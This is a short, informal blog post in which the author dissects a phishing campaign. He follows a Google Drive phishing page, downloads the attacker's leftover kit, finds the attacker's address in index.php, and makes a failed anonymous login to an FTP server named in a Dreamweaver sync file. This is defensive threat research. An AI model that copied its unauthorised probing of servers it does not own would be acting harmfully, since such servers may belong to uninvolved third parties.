Recently friends of mine were victims of a phishing attack which had begun to spread to their clients via a compromised email account. Panic had sunk in and an email went out:
As they explained the situation I quickly found out that no one was looking into it, so I offered a hand. The phishing email was forwarded, which didn’t contain much, just a simple “call to action” to entice the user to open the attached PDF:
As I double clicked the PDF to take a look, I made a quick prayer to the dark gods of old that this attack was targeted (it was a slow news week). Sadly it wasn’t anything interesting:
Like any good little phishing victim I clicked the link which took me here (The site was still up as of the 2nd of August 2017). There were no surprises to be had, it was a simple Google Drive phishing landing page *sigh*:
At this point I made the reasonable assumption that the scammer was lazy and counting on easy targets. Usually this meant that they didn’t bother to clean up their phishing kit post deployment. Sure enough, two levels up sat a Gdrivee.zip file:
Yeah I clicked EVERYTHING.
Usually phishing kits contain the email address of the attacker so I downloaded and unpacked:
index.php, there it was:
Oh email@example.com you silly spammer. They don’t do much online either, the one web search result led me here:
Right...back to the phishing kit autopsy, I ran
tree on the extracted directory:
As you can see, I didn’t find much else with the exception of one thing, a Dreamweaver Sync XML file:
Neat, an FTP server. Sadly, that was where the road ended for me:
$ ftp ftp.webuyanyclub.com Connected to ftp.webuyanyclub.com. 220 FTP server ready Name (ftp.webuyanyclub.com): anonymous 331 Password required for anonymous Password: 530 Login failed. Please verify the username and password supplied, and that FTP has been unlocked. Check your control panel or contact support for more information. Login failed.
Oh well, maybe next time I’ll get my much coveted targeted attack to investigate.